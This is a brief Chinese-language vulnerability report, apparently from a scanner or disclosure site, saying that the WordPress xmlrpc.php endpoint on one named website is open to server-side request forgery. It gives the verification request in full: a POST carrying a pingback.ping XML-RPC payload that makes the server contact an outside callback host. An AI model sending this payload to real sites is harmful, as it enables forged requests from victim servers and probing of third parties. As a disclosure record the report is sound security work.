WordPress xmlrpc.php 存在SSRF漏洞
xmlrpc.php 存在SSRF漏洞 漏洞地址:http://baijie.joowp.com/xmlrpc.php 验证方法:
POST http://baijie.joowp.com/xmlrpc.php <?xml version="1.0" encoding="iso-8859-1"?> <methodCall> <methodName>pingback.ping</methodName> <params> <param><value><string>http://qxotxt.s0x.cn/</string></value></param> <param><value><string>http://baijie.joowp.com//?p=1</string></value></param> </params> </methodCall>
匹配内容: